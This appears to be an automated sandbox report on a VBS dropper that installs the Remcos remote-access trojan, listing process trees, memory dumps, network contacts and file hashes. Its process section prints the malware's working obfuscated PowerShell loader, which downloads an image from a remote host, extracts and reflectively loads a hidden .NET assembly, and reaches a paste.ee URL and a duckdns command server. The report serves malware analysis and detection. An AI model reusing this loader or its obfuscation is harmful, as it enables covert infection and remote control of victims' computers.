memory/2164-287-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-288-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-289-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-290-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-292-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-293-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-294-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-295-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-297-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-298-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-299-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-300-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-302-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-303-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-304-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-305-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-307-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-308-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-309-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-311-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-312-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-313-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-314-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-316-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-317-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-318-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-319-0x0000000000400000-0x0000000000482000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-11 11:43

Reported

2024-05-11 11:46

Platform

win10v2004-20240508-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sostener.vbs"

Signatures

Remcos

rat remcos

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4512 set thread context of 1080 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2944 wrote to memory of 1176 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2944 wrote to memory of 1176 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1176 wrote to memory of 4512 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1176 wrote to memory of 4512 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4512 wrote to memory of 4852 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
PID 4512 wrote to memory of 4852 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
PID 4512 wrote to memory of 4852 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
PID 4512 wrote to memory of 1080 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
PID 4512 wrote to memory of 1080 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
PID 4512 wrote to memory of 1080 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
PID 4512 wrote to memory of 1080 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
PID 4512 wrote to memory of 1080 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
PID 4512 wrote to memory of 1080 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
PID 4512 wrote to memory of 1080 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
PID 4512 wrote to memory of 1080 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
PID 4512 wrote to memory of 1080 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
PID 4512 wrote to memory of 1080 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
PID 4512 wrote to memory of 1080 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
PID 4512 wrote to memory of 1080 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sostener.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreDDgTreDgTreLwBjDgTreEEDgTreYwBSDgTreGEDgTreLwBkDgTreC8DgTreZQBlDgTreC4DgTreZQB0DgTreHMDgTreYQBwDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCwDgTreJwBBDgTreGQDgTreZDgTreBJDgTreG4DgTreUDgTreByDgTreG8DgTreYwBlDgTreHMDgTrecwDgTrezDgTreDIDgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('0/cAcRa/d/ee.etsap//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"

C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 paste.ee udp
US 104.21.84.67:443 paste.ee tcp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 67.84.21.104.in-addr.arpa udp
US 8.8.8.8:53 131.185.250.142.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 uploaddeimagens.com.br udp
US 104.21.45.138:443 uploaddeimagens.com.br tcp
US 8.8.8.8:53 138.45.21.104.in-addr.arpa udp
US 104.21.84.67:443 paste.ee tcp
US 8.8.8.8:53 newssssssssssssss.duckdns.org udp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 17.143.109.104.in-addr.arpa udp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
US 8.8.8.8:53 newssssssssssssss.duckdns.org udp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
US 8.8.8.8:53 newssssssssssssss.duckdns.org udp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
US 8.8.8.8:53 13.179.89.13.in-addr.arpa udp

Files

memory/1176-9-0x00007FF849203000-0x00007FF849205000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zy4sfk2a.5wl.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1176-19-0x000002DC7CCB0000-0x000002DC7CCD2000-memory.dmp

memory/1176-20-0x00007FF849200000-0x00007FF849CC1000-memory.dmp

memory/1176-21-0x00007FF849200000-0x00007FF849CC1000-memory.dmp

memory/4512-31-0x00000214A0000000-0x00000214A02C0000-memory.dmp

memory/1080-32-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1080-35-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1080-36-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1080-39-0x0000000000400000-0x0000000000482000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 f41839a3fe2888c8b3050197bc9a0a05
SHA1 0798941aaf7a53a11ea9ed589752890aee069729
SHA256 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA512 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1a11402783a8686e08f8fa987dd07bca
SHA1 580df3865059f4e2d8be10644590317336d146ce
SHA256 9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0
SHA512 5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

memory/1176-43-0x00007FF849200000-0x00007FF849CC1000-memory.dmp

memory/1080-44-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1080-46-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1080-47-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1080-49-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1080-50-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1080-52-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1080-53-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1080-55-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1080-56-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1080-57-0x0000000000400000-0x0000000000482000-memory.dmp

C:\ProgramData\remcos\registros.dat

MD5 407057db598934720788542384bd86b0
SHA1 88acae276f46da90da7a1524f5550660ef678437
SHA256 2a86015d206adc73d36d24ad18d2e5c133b2781767f444df468339d58a409872
SHA512 9e3bb4ecceebbcd9893b6d2a6515b566d069f8a1aad3f0af9560e4bd35cb897140aeed1745b69543533be2f5823be9519b84292db411806e64ffdae10c35ee6b

memory/1080-59-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1080-60-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1080-61-0x0000000000400000-0x0000000000482000-memory.dmp

